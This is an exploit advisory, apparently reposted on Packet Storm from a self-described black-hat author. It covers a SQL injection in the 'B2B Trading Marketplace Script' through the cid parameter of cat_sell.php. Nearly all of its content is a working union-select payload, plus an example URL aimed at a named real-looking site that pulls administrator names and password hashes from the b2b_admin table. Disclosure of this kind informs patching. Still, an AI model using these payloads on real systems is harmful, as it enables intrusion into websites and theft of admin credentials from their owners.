B2B Trading Marketplace Script suffers from a remote SQL injection vulnerability.
be27f869b870e2dfab57ba241d2b5d06d121277a2afea8a8c0746dc857f474e7####################################################################
[+] Exploit Title : B2B Trading Marketplace Script [ Sql Injection Vulnerability]
[+] Author : Egyptian.H4x0rz
[+] Contact : SpY(at)Hotmail.Com
[+] Date : 05-04-2011
[+] Software Link: http://www.softbizscripts.com/b2b-trading-marketplace-script-features.php
[+] category: Web Apps [SQli]
[+] HomePage : Black-hat.cc
####################################################################
Vulnerability:
*SQL injection Vulnerability*
[#] http://patch/cat_sell.php?cid=union+select+1,[sqli],3,4,5,6,7,8,9
~
[#] eXample
http://www.computerstraders.com/cat_sell.php?cid=1+union+select+1,concat_ws(0x3a,dd_id,dd_admin_name,dd_pwd),3,4,5,6,7,8,9+from+ b2b_admin--
####################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed